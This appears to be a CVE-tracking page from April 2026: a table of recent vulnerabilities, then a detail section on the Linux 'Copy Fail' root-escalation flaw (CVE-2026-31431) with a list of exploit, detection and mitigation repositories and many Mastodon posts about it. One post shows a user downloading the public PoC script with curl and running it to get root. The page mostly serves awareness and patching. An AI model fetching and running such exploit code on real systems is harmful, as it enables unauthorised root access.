## Updated at UTC 2026-04-30T12:16:00.090022

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2026-31431 7.8 0.01% 103 68 2026-04-30T11:16:20.723000 In the Linux kernel, the following vulnerability has been resolved: crypto: alg
CVE-2026-39457 None 0.00% 2 0 2026-04-30T09:30:32 When exchanging data over a socket, libnv uses select(2) to wait for data to arr
CVE-2026-7270 None 0.00% 2 0 2026-04-30T09:30:32 An operator precedence bug in the kernel results in a scenario where a buffer ov
CVE-2026-7164 None 0.00% 2 0 2026-04-30T09:30:32 Incorrect packet validation allowed unbounded recursion parsing SCTP chunk param
CVE-2026-5402 8.8 0.00% 2 0 2026-04-30T09:30:31 TLS protocol dissector heap overflow in Wireshark 4.6.0 to 4.6.4 allows denial o
CVE-2026-42511 None 0.00% 2 0 2026-04-30T09:30:31 The BOOTP file field is written to the lease file without escaping embedded doub
CVE-2026-42512 0 0.00% 2 0 2026-04-30T09:16:03.373000 As dhclient is building an environment to pass to dhclient-script, it may need t
CVE-2026-35547 0 0.00% 2 0 2026-04-30T09:16:03.167000 When processing the header of an incoming message, libnv failed to properly vali
CVE-2026-5201 7.5 0.09% 1 1 2026-04-30T08:16:07.410000 A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vuln
CVE-2026-7470 8.8 0.00% 2 0 2026-04-30T03:16:01.740000 A flaw has been found in Tenda 4G300 US_4G300V1.0Mt_V1.01.42_CN_TDC01. Affected
CVE-2026-41940 9.8 0.00% 14 8 template 2026-04-30T01:16:02.837000 cPanel and WHM versions after 11.40 contain an authentication bypass vulnerabili
CVE-2026-7420 8.8 0.00% 2 0 2026-04-30T00:31:28 A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-18053
CVE-2026-7419 8.8 0.00% 2 0 2026-04-30T00:31:28 A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. Th
CVE-2026-7424 8.1 0.00% 2 0 2026-04-29T23:16:20.367000 Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4
CVE-2026-7418 8.8 0.00% 2 0 2026-04-29T22:16:22.620000 A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. Th
CVE-2026-34965 8.8 0.00% 2 0 2026-04-29T21:31:37 Cockpit CMS contains an authenticated remote code execution vulnerability in the
CVE-2026-42515 0 0.05% 1 0 2026-04-29T21:14:23.977000 This vulnerability exists in e-Sushrut due to improper access control in resourc
CVE-2026-5166 9.6 0.00% 4 0 2026-04-29T21:13:30.563000 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') v
CVE-2026-30893 9.0 0.00% 3 0 2026-04-29T20:16:29.660000 Wazuh is a free and open source platform used for threat prevention, detection,
CVE-2026-7466 8.8 0.00% 2 0 2026-04-29T19:16:27.013000 AgentFlow contains an arbitrary code execution vulnerability that allows attacke
CVE-2026-0204 8.0 0.00% 1 0 2026-04-29T18:31:42 A vulnerability in the access control mechanism of SonicOS may allow certain man
CVE-2026-6849 8.8 0.00% 1 1 2026-04-29T18:31:41 Improper neutralization of special elements used in an OS command ('OS command i
CVE-2026-5712 8.0 0.00% 1 0 2026-04-29T18:16:05.180000 This vulnerability impacts all versions of IdentityIQ and allows an authenticate
CVE-2026-42167 8.1 0.24% 4 2 template 2026-04-29T16:16:25.303000 mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary
CVE-2026-7344 8.8 0.01% 1 0 2026-04-29T15:31:44 Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.
CVE-2026-7343 9.8 0.03% 1 0 2026-04-29T15:31:43 Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allo
CVE-2026-42523 9.0 0.00% 3 0 2026-04-29T15:16:07.077000 Jenkins GitHub Plugin 1.46.0 and earlier improperly processes the current job UR
CVE-2026-5760 9.8 0.38% 1 1 2026-04-29T14:16:19.920000 SGLang's reranking endpoint (/v1/rerank) achieves Remote Code Execution (RCE) wh
CVE-2026-7321 9.6 0.04% 1 0 2026-04-29T06:16:08.357000 Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking co
CVE-2026-42615 7.2 0.01% 2 0 2026-04-29T04:16:41.750000 GCHQ CyberChef before 11.0.0 allows XSS via Show Base64 offsets, as demonstrated
CVE-2026-23773 4.3 0.01% 1 0 2026-04-29T04:16:40.867000 Dell Disk Library for Mainframe, version(s) DLm 8700/2700 contain(s) a Server-Si
CVE-2026-41873 9.8 0.12% 1 0 2026-04-29T00:31:25 ** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('H
CVE-2026-32202 4.3 7.19% 7 1 2026-04-28T21:47:02.087000 Protection mechanism failure in Windows Shell allows an unauthorized attacker to
CVE-2024-1708 8.4 81.62% 4 3 2026-04-28T21:44:53.770000 ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulner
CVE-2026-25874 9.8 0.11% 3 0 2026-04-28T21:37:03 LeRobot contains an unsafe deserialization vulnerability in the async inference
CVE-2026-24222 8.6 0.04% 2 0 2026-04-28T21:36:23 NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initializati
CVE-2026-24231 6.3 0.01% 1 0 2026-04-28T21:36:22 NVIDIA NemoClaw contains a vulnerability in the validateEndpointUrl() SSRF prote
CVE-2026-7289 8.8 0.04% 1 0 2026-04-28T20:25:44.987000 A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the func
CVE-2026-7288 8.8 0.04% 1 0 2026-04-28T20:25:44.987000 A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability aff
CVE-2026-38651 8.2 0.04% 1 0 2026-04-28T20:23:20.703000 Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0.
CVE-2026-7279 7.8 0.01% 1 0 2026-04-28T20:22:38.260000 AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowi
CVE-2025-67223 7.5 0.13% 1 1 2026-04-28T20:18:13.020000 The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk be
CVE-2026-40976 9.1 0.04% 1 0 2026-04-28T20:11:56.713000 In certain circumstances, Spring Boot's default web security is ineffective allo
CVE-2026-24186 8.8 0.06% 2 0 2026-04-28T20:10:42.070000 NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause
CVE-2026-24178 9.8 0.14% 2 0 2026-04-28T20:10:42.070000 NVIDIA NVFlare Dashboard contains a vulnerability in the user management and aut
CVE-2026-24204 6.5 0.04% 1 0 2026-04-28T20:10:42.070000 NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Imprope
CVE-2026-3893 9.4 0.06% 1 0 2026-04-28T20:10:23.367000 The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing a
CVE-2026-41384 7.8 0.01% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.3.24 contains an environment variable injection vulnerabili
CVE-2026-41383 8.1 0.04% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability
CVE-2026-41394 8.2 0.05% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where
CVE-2026-41396 7.8 0.01% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_B
CVE-2026-41912 7.6 0.03% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vu
CVE-2026-42426 8.8 0.03% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.8 contains an improper authorization vulnerability where
CVE-2026-42423 7.5 0.04% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that by
CVE-2026-42431 8.1 0.03% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke
CVE-2026-40473 8.8 0.11% 1 1 2026-04-28T19:43:05.663000 The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter
CVE-2026-3854 8.8 0.35% 30 4 2026-04-28T19:37:39.507000 An improper neutralization of special elements vulnerability was identified in G
CVE-2026-7320 7.5 0.03% 1 0 2026-04-28T18:31:36 Information disclosure due to incorrect boundary conditions in the Audio/Video c
CVE-2026-42432 None 0.02% 1 0 2026-04-28T18:30:39 ## Impact Node Pairing Reconnect Command Escalation Bypasses operator.admin Sco
CVE-2026-42422 None 0.04% 1 0 2026-04-28T18:28:01 ## Impact OpenClaw `device.token.rotate` mints tokens for unapproved roles, byp
CVE-2026-41914 None 0.03% 1 0 2026-04-28T18:26:36 ## Impact QQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths.
CVE-2026-41405 None 0.14% 1 0 2026-04-28T18:24:06 ## Summary MS Teams webhook parses body before JWT validation, enabling unauthen
CVE-2026-41404 None 0.07% 1 0 2026-04-28T18:23:43 ## Summary Incomplete scope-clearing fix allows operator.admin escalation via tr
CVE-2026-41399 None 0.05% 1 0 2026-04-28T18:22:28 ## Summary The gateway accepted unbounded concurrent unauthenticated WebSocket
CVE-2026-41395 None 0.02% 1 0 2026-04-28T18:21:09 ## Summary Plivo V3 signature verification canonicalized query ordering, but re
CVE-2026-41387 9.7 0.02% 1 0 2026-04-28T18:18:46 ## Summary Host exec env override sanitization did not fail closed for several
CVE-2026-41386 None 0.03% 1 0 2026-04-28T18:18:23 ## Summary Bootstrap setup codes were not bound to the intended device role and
CVE-2026-41378 None 0.18% 1 0 2026-04-28T18:15:32 ## Summary Paired node escalates to gateway RCE via unrestricted node.event agen
CVE-2026-41602 7.5 0.13% 1 0 2026-04-28T15:31:54 Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport G
CVE-2026-27760 8.1 0.10% 1 0 2026-04-28T15:30:58 OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in
CVE-2026-5944 8.2 0.09% 1 0 2026-04-28T15:30:52 An improper access control vulnerability exists in the Cisco Intersight Device C
CVE-2026-3323 7.5 0.01% 1 0 2026-04-28T12:31:36 An unsecured configuration interface on affected devices allows unauthenticated
CVE-2026-35431 10.0 0.09% 1 0 2026-04-28T12:10:53.103000 Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management
CVE-2026-5450 9.8 0.05% 1 0 2026-04-23T15:33:34.277000 Calling the scanf family of functions with a %mc (malloc'd character match) in t
CVE-2026-3844 9.8 0.08% 1 5 template 2026-04-23T04:00:28 The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads du
CVE-2026-5588 0 0.01% 1 0 2026-04-21T16:16:20.540000 Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the
CVE-2026-33626 7.5 0.04% 1 0 2026-04-21T15:04:13 ## Summary A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeplo
CVE-2026-20147 9.9 0.28% 1 0 2026-04-17T15:09:46.880000 A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem
CVE-2025-61260 9.8 0.10% 1 0 2026-04-16T22:56:43 A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enabl
CVE-2026-34197 8.8 65.07% 1 9 template 2026-04-16T21:49:17 Improper Input Validation, Improper Control of Generation of Code ('Code Injecti
CVE-2026-20148 4.9 0.06% 1 0 2026-04-15T18:32:03 A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem
CVE-2026-26157 7.0 0.01% 1 0 2026-04-15T00:35:42.020000 A flaw was found in BusyBox. Incomplete path sanitization in its archive extract
CVE-2025-46811 9.8 0.10% 1 1 2026-04-15T00:35:42.020000 A Missing Authorization vulnerability in SUSE Linux Manager allows anyone with t
CVE-2026-35414 4.2 0.02% 1 2 2026-04-10T19:36:57.163000 OpenSSH before 10.3 mishandles the authorized_keys principals option in uncommon
CVE-2025-8065 6.5 0.08% 2 0 2026-04-03T18:31:04 A buffer overflow vulnerability exists in the ONVIF XML parser of Tapo C200 V3.
CVE-2026-25047 None 0.02% 1 1 2026-02-27T20:45:41 ### Summary A prototype pollution vulnerability exists in version 1.0.7 of the d
CVE-2026-26335 9.8 0.13% 1 1 2026-02-26T22:45:37.080000 Calero VeraSMART versions prior to 2022 R1 use static ASP.NET/IIS machineKey val
CVE-2025-69985 9.8 0.92% 1 2 2026-02-26T19:39:20.677000 FUXA 1.2.8 and prior contains an Authentication Bypass vulnerability leading to
CVE-2026-2441 8.8 0.41% 1 11 2026-02-23T13:24:55.920000 Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote a
CVE-2026-25961 7.5 0.03% 1 1 2026-02-20T20:22:32.817000 SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, Sumatra
CVE-2026-26235 7.5 0.40% 1 1 2026-02-20T19:52:03.777000 JUNG Smart Visu Server 1.1.1050 contains a denial of service vulnerability that
CVE-2026-24486 8.6 0.03% 1 0 2026-02-17T20:44:50.210000 Python-Multipart is a streaming multipart parser for Python. Prior to version 0.
CVE-2025-24054 6.5 7.83% 2 11 2026-02-13T21:25:23.527000 External control of file name or path in Windows NTLM allows an unauthorized att
CVE-2026-21248 7.3 0.03% 1 0 2026-02-11T20:15:17.870000 Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to e
CVE-2026-25732 7.5 0.08% 1 1 2026-02-07T00:31:59 ### Summary NiceGUI's `FileUpload.name` property exposes client-supplied filenam
CVE-2025-12383 None 0.04% 1 0 2026-02-05T15:43:37 In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignori
CVE-2026-25130 9.7 0.04% 1 1 2026-01-31T03:53:47 ## Summary The CAI (Cybersecurity AI) framework contains multiple argument inje
CVE-2025-68705 None 0.04% 1 1 2026-01-07T21:34:38 # RustFS Path Traversal Vulnerability ## Vulnerability Details - **CVE ID**:
CVE-2025-68161 None 0.03% 1 0 2025-12-19T22:08:03 The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does
CVE-2025-48924 6.5 0.04% 1 1 2025-11-05T20:30:33 Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects
CVE-2025-59250 8.1 0.08% 1 0 2025-10-30T16:35:42.213000 Improper input validation in JDBC Driver for SQL Server allows an unauthorized a
CVE-2019-1367 7.5 90.77% 1 1 2025-10-22T00:32:47 A remote code execution vulnerability exists in the way that the scripting engin
CVE-2025-59536 None 0.03% 1 5 2025-10-03T14:16:36 Due to a bug in the startup trust dialog implementation, Claude Code could be tr
CVE-2025-54136 7.2 0.11% 1 1 2025-08-25T01:41:36.580000 Cursor is a code editor built for programming with AI. In versions 1.2.4 and bel
CVE-2025-47987 7.8 0.53% 1 1 2025-07-14T17:38:41.223000 Heap-based buffer overflow in Windows Cred SSProvider Protocol allows an authori
CVE-2024-46987 7.7 24.00% 1 10 2025-04-17T19:15:59.520000 Camaleon CMS is a dynamic and advanced content management system based on Ruby o
CVE-2025-29787 None 0.33% 1 0 2025-03-19T15:51:05 ### Summary In the archive extraction routine of affected versions of the `zip
CVE-2024-28397 8.8 65.10% 1 16 template 2024-08-04T05:01:02 An issue in the component `js2py.disable_pyimport()` of js2py up to v0.74 allows
CVE-2026-25643 0 0.39% 1 3 N/A
CVE-2026-42238 0 0.00% 2 0 N/A
CVE-2026-24897 0 0.19% 1 0 N/A
CVE-2026-42208 0 0.00% 7 1 N/A
CVE-2026-26015 0 0.00% 2 0 N/A
CVE-2026-7426 0 0.00% 2 0 N/A
CVE-2026-25262 0 0.00% 1 0 N/A
CVE-2026-5545 0 0.00% 1 0 N/A
CVE-2026-6253 0 0.00% 1 0 N/A
CVE-2026-7168 0 0.00% 1 0 N/A
CVE-2026-6429 0 0.00% 1 0 N/A
CVE-2026-41649 0 0.03% 1 0 N/A

CVE-2026-31431
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-30T11:16:20.723000

103 posts

In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just

68 repos

https://github.com/eleveni386/CVE-2026-31431-Golang

https://github.com/mgmlme/cve_2026_31431_live-mitigation

https://github.com/Alfredooe/CVE-2026-31431

https://github.com/Aurillium/RootRemover

https://github.com/arkdev1/check-cve-2026-31431

https://github.com/ruattd/cve-2026-31431

https://github.com/adampielak/CVE-2026-31431_SCA_WAZUH

https://github.com/Isw-9/copy-fail-cve-2026-31431-aarch64

https://github.com/painoob/Copy-Fail-Exploit-CVE-2026-31431

https://github.com/someCorp/copyFail-CVE-2026-31431-workaround-bash

https://github.com/0xBlackash/CVE-2026-31431

https://github.com/jmac774/CVE-2026-31431-mitigation-rhel

https://github.com/TikoTikTok/copy-fail-cve-2026-31431

https://github.com/JnamerZ/CopyFail-CVE-2026-31431

https://github.com/G01d3nW01f/CVE-2026-31431

https://github.com/dorianhhuc/CVE-2026-31431

https://github.com/yandex-cloud-examples/yc-mk8s-copy-fail-mitigation

https://github.com/wuwu001/CVE-2026-31431-exploit

https://github.com/Y5neKO/copy-fail-CVE-2026-31431-universal

https://github.com/nisec-eric/cve-2026-31431

https://github.com/dicatalin/Copy_Fail_CVE-2026-31431_test_and_fix

https://github.com/H1d3r/copy-fail_LPE_Interactive

https://github.com/dixyes/fuck_cve_2026_31431

https://github.com/lonelyor/CVE-2026-31431-exp

https://github.com/wuzuowei/copy-fail-CVE-2026-31431

https://github.com/insomnisec/Detections-CVE-2026-31431

https://github.com/b5null/CVE-2026-31431-C

https://github.com/theori-io/copy-fail-CVE-2026-31431

https://github.com/freelabz/CVE-2026-31431

https://github.com/twowb/CVE-2026-31431-

https://github.com/gmeghnag/TEST-CVE-2026-31431

https://github.com/guard-wait/CVE-2026-31431_EXP

https://github.com/novysodope/copy-fail-CVE-2026-31431-C

https://github.com/desultory/CVE-2026-31431

https://github.com/gubaiovo/CVE-2026-31431

https://github.com/adysec/cve-2026-31431

https://github.com/slauger/CVE-2026-31431

https://github.com/jiangban046-spec/CVE-2026-31431-exploit_py2_py3

https://github.com/rootsecdev/cve_2026_31431

https://github.com/Phalanx-CCS/Copy-Fail

https://github.com/tgies/copy-fail-c

https://github.com/badsectorlabs/copyfail-go

https://github.com/Sndav/CVE-2026-31431-Advanced-Exploit

https://github.com/amdisrar/cve-2026-31431-mitigation

https://github.com/jbiniek/copy.fail-mitigation-MLM

https://github.com/rio128128/copy-fail-CVE-2026-31431

https://github.com/WavesMan/cve-2026-31431-fleet-remediator

https://github.com/Webhosting4U/Copy-Fail_Detect_and_mitigate_CVE-2026-31431

https://github.com/shadowabi/CVE-2026-31431-CopyFail-Universal-LPE

https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC

https://github.com/makitos666/CVE-2026-31431-Copy-Fail-Detection-Toolkit

https://github.com/vishwanathakuthota/copy-fail-CVE-2026-31431

https://github.com/Linux-zs/cve-2026-31431-mitigation

https://github.com/bigwario/copy-fail-CVE-2026-31431-C

https://github.com/0xShe/CVE-2026-31431

https://github.com/kadir/copy-fail-CVE-2026-31431-IOC

https://github.com/ZephrFish/CopyFail-CVE-2026-31431

https://github.com/pascal-gujer/CVE-2026-31431

https://github.com/luotian2/CVE-2026-31431

https://github.com/ryan2929/CVE-2026-31431

https://github.com/yiyihuohuo/CVE-2026-31431

https://github.com/thrandomv/cve-2026-31431-detection

https://github.com/NichiyaOba/linux-vuln-CVE-2026-31431

https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Statically-PoC

https://github.com/mrowkoob/copy-fail-mitigate-no-reboot

https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail

https://github.com/Crihexe/copy-fail-tiny-elf-CVE-2026-31431

https://github.com/Theori-lO/copy-fail-CVE-2026-31431

jcrabapple@dmv.community at 2026-04-30T11:50:41.000Z ##

Copy Fail — CVE-2026-31431

copy.fail/

##

CuratedHackerNews@mastodon.social at 2026-04-30T11:39:04.000Z ##

Copy-fail-destroyer: K8s remediation for CVE-2026-31431

github.com/NorskHelsenett/copy

#github #k8s

##

Natanox@chaos.social at 2026-04-30T11:16:58.000Z ##

@yuka Debian is uncomfortably slow pushing the fix.
security-tracker.debian.org/tr

##

harld@masto.ai at 2026-04-30T11:04:20.000Z ##

Toch altijd wel knap wat hackers weten te vinden.

'Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.'

"Copy Fail — CVE-2026-31431"

copy.fail/

##

beyondmachines1 at 2026-04-30T11:01:29.165Z ##

Copy Fail: Linux Kernel Flaw Grants Root Access On All Major Distributions

A Linux kernel vulnerability called "Copy Fail" (CVE-2026-31431) allows unprivileged local users to gain root privileges with 100% reliability by corrupting the shared page cache. The flaw affects nearly all Linux distributions since 2017 and enables container escapes because the memory corruption does not modify files on disk.

**If you run Linux servers, especially shared environments like Kubernetes clusters, CI/CD runners, or multi-tenant hosts, patch your kernel immediately to a version that includes the fix (mainline commit a664bf3d603d) for CVE-2026-31431. If you can't patch right away, disable the vulnerable module by running echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf followed by rmmod algif_aead, and for untrusted code environments block AF_ALG socket creation via seccomp as a long-term safeguard.**

beyondmachines.net/event_detai

##

agresor at 2026-04-30T10:35:46.112Z ##

Copy Fail (CVE-2026-31431): 732 bajty do przejęcia kontroli nad systemem ( nfsec.pl/security/6718 )

youtube.com/watch?v=-RuJTJga2fU

##

Atirut@toot.community at 2026-04-30T10:26:18.000Z ##

PSA for sysadmins: master.almalinux-org.pages.dev

TL;DR anyone with an unpriviledged shell can become root with a small exploit. One mean fucker, so be sure to update ASAP once available if you're within blast radius.

#sysadmin #Linux #psa #cve

##

egghat@mastodon.social at 2026-04-30T10:06:30.000Z ##

Oops.

„If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you're in scope.“

Copy Fail — CVE-2026-31431 copy.fail/
#BadNews

##

cyberveille@mastobot.ping.moi at 2026-04-30T10:00:24.000Z ##

📢 CVE-2026-31431 ' Copy Fail ' : escalade de privilèges root en 732 octets sur toutes les distributions Linux majeures
📝 ## 🔍 Contexte

Publié le 29 avril 2026 sur le blog de Xint (xint.io), cet article est une...
📖 cyberveille : cyberveille.ch/posts/2026-04-3
🌐 source : xint.io/blog/copy-fail-linux-d
#AF_ALG #CVE_2016_5195 #Cyberveille

##

decio at 2026-04-30T09:59:10.859Z ##

[VULN] ⚠️"Copy Fail - Une IA trouve la faille Linux que personne n'a vue"
" * Copy Fail (CVE-2026-31431) est une faille Linux qui permet de passer de simple utilisateur à root en 732 octets, affectant la quasi-totalité des kernels non patchés depuis 2017, découverte par une IA en une heure.

  • La faille exploite une optimisation de 2017 dans le sous-système crypto qui laisse un fichier en lecture seule accessible en zone modifiable, permettant de modifier progressivement un binaire système via l'appel splice().
  • Deux solutions de protection existent : patcher le kernel via la distro ou désactiver le module algif_aead (ou bloquer le sous-système crypto via seccomp si le module est intégré en dur)."👇 korben.info/copy-fail-faille-k

Demo / exploit ( via @bortzmeyer )
👇
bortzmeyer.org/copyfail.html

🔍
⬇️
vulnerability.circl.lu/vuln/CV

💬
⬇️
infosec.pub/post/45735124

##

pbloem@sigmoid.social at 2026-04-30T09:55:18.000Z ##

So, copy.fail was found with one hour of AI assistance, and would (according to this article) have earned $500K on the open market not too long ago.

bugcrowd.com/blog/what-we-know

I'm no security researcher, but this kind of contradicts all those people who said that the OpenBSD bug that Mythos found (for $20K of compute) was just fancy fuzzing, and the only reason it was there was that nobody was investing 20K in OpenBSD security and the security threat of modern AI was all hype.

##

rabbithawk256@wetdry.world at 2026-04-30T09:03:35.000Z ##

so what do I even do at this point. the patch for CVE-2026-31431 isn't out yet on debian stable and the only fixes I see are to recompile the kernel which I have zero idea how to do

##

mastokukei@social.josko.org at 2026-04-30T09:02:02.000Z ##

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei masto.kukei.eu/browse/programm category:
- **AI coding tools and controversies**: Discussions on Claude Code deleting databases, GitHub Copilot’s usage-based billing, and AI-generated code ownership debates.
- **GitHub reliability and alternatives**: Criticism of GitHub’s frequent outages, security vulnerabilities (e.g., CVE-2026-31431, CVE-2026-3854), and migrations to alternatives like [1/3]

##

mastokukei@social.josko.org at 2026-04-30T09:01:49.000Z ##

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #technologyAtKukei masto.kukei.eu/browse/technolo category:
- **AI and LLM Developments & Controversies**: Discussions on AI solving mathematical problems (Erdős problem), AI-generated content issues (goblins in OpenAI Codex), AI agents causing data loss (Claude deleting databases), and AI ethics concerns (biological weapons, copyright infringement).
- **Linux Security Vulnerability (CVE-2026-31431)**: A [1/3]

##

stuartl@longlandclan.id.au at 2026-04-30T09:00:48.000Z ##

@chuso Probably worth mentioning the related bug on #Gentoo Bugzilla.

bugs.gentoo.org/show_bug.cgi?i

Looks like @thesamesam is well and truly onto it.

Also for #Debian users, at the moment they're working on fixes: security-tracker.debian.org/tr

Edit: Nothing seen on the #AlpineLinux front, I guess we'll hear from @alpinelinux in due course.

##

yumetodo@misskey.dev at 2026-04-30T08:36:52.110Z ##

むー?まずいか?
Linuxカーネルの脆弱性「CopyFail (CVE-2026-31431)」をEC2のUbuntu 22.04で実証してみた
https://zenn.dev/aeyesec/articles/7e4a1e3c83e81b

##

SpaceLifeForm at 2026-04-30T07:32:55.031Z ##

I can confirm this report where Copyfail fails.

github.com/theori-io/copy-fail

##

tisba@ruby.social at 2026-04-30T07:20:51.000Z ##

Copy Fail (copy.fail/, CVE-2026-31431) is a good reminder why I don’t want to run CI jobs only in containers.

It would be great to get some momentum to code.forgejo.org/forgejo/forge (microVMs for forgejo actions). At least on bare metal (or nested VMs with nested KVM) this would make things a lot safer. It would also simplify the usage of containers/docker in CI jobs without compromising security, which is kind of a pain with Codeberg Action currently.

#security

##

isAutonomous@karlsruhe-social.de at 2026-04-30T07:08:34.000Z ##

@giggls Verdammt, ja. Das ist die richtige ID:
euvd.enisa.europa.eu/vulnerabi

Die Bezeichnungen bei den Europäern sind irritierend. Warum müssen die eigene Nummern vergeben?
"EUVD-2026-24639"

##

bws@social.linux.pizza at 2026-04-30T06:54:59.000Z ##

@fooflington ich bins grade.
security-tracker.debian.org/tr
Einfach mal nen poc (nicht überprüft) raushauen ohne responsible disclosure fürn maximalen fame um den eigenen KI scanner zu promoten.

##

chrispy@chaos.social at 2026-04-30T06:48:18.000Z ##

@fanf42 → lets an unprivileged local user write into the page cache and obtain root
CVE-2026-31431, no score yet at NIST

##

ligasser@social.epfl.ch at 2026-04-30T06:44:01.000Z ##

#linux #kernel #exploit - I completely missed this one:

bugcrowd.com/blog/what-we-know

Privilege escalation on all linux kernels since 2017. And I cannot even see if my current ubuntu kernel has a patch for it...

Gotta sign up on some more security accounts here!

##

rimu@piefed.social at 2026-04-30T06:37:44.933Z ##

A mitigation that worked for me - https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/26

##

undercodenews@mastodon.social at 2026-04-30T05:43:19.000Z ##

Linux Kernel “Copy Fail” Zero-Day Exposes Millions of Systems to Instant Root Access

Introduction A newly disclosed Linux kernel vulnerability is raising serious alarms across the cybersecurity world. Tracked as CVE-2026-31431 and nicknamed Copy Fail, the flaw allows any unprivileged local user to gain full root access on many Linux systems released since 2017. Security researchers say the exploit is unusually simple, reliable, and dangerous, requiring only a short…

undercodenews.com/linux-kernel

##

cr0nym@mastodon.social at 2026-04-30T05:20:24.000Z ##

CVE-2026-31431 #copyfail Tetragon Tracing Policy - Kill unprivileged aead_recvmsg. This is the low-level customization of configuration policies your #Linux EDR should have. Also, watch out for processes running NULL argv gist.github.com/cr0nx/3079c573

##

appinn@pullopen.xyz at 2026-04-30T04:17:04.000Z ##

『Copy Fail:2017年至今的漏洞,一个脚本获得 Linux root 管理员权限|CVE-2026-31431』
只需要10行代码,就能获得自2017年至今大多数 Linux 发行版本的 root 权限。史称 Copy Fail,漏洞编号 CVE-2026-31431 先看提权演示视频 演示代码 代码来
……
阅读全文: :sys_link: appinn.com/copy-fail-cve-2026-

#小众软件

##

tankgrrl@hachyderm.io at 2026-04-30T02:46:20.000Z ##

Joker voice: Just wait 'til malicious agents and oberly aggressive users get a load of CVE-2026-31431

##

tankgrrl@hachyderm.io at 2026-04-30T02:40:15.000Z ##

So... came home to a proverbial tire fire. CVE-2026-31431

Yay. I am bold and DGAF so I made the call to shut off all login access (a call backed up by my peers shortly after).

Users who don't check their mail, look at status, or check our websites will be sending in 'URGENT' tickets any minute now.

##

thesamesam@treehouse.systems at 2026-04-30T01:06:03.000Z ##

Very unfortunate that the fix for CVE-2026-31431 isn't easily backportable, with a new API being added, and then its implementation details changing, since the last LTS (6.12 vs 6.18).

##

newsyc500@toot.community at 2026-04-30T00:43:14.000Z ##

Copy Fail – CVE-2026-31431: copy.fail/

Discussion: news.ycombinator.com/item?id=4

##

hn500@social.lansky.name at 2026-04-30T00:35:11.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

adamw@fosstodon.org at 2026-04-29T23:39:24.000Z ##

@marshray doesn't work on vaguely recent F44 kernel for me.

[adamw@omnibook ~]$ curl -o /tmp/test.py raw.githubusercontent.com/theo
[adamw@omnibook ~]$ python3 /tmp/test.py
Password:
su: Authentication failure
[adamw@omnibook ~]$ uname -r
6.19.13-300.fc44.x86_64

##

hnbest@mastodon.social at 2026-04-29T23:00:01.000Z ##

Copy Fail – CVE-2026-31431
copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

obivan at 2026-04-29T22:43:47.841Z ##

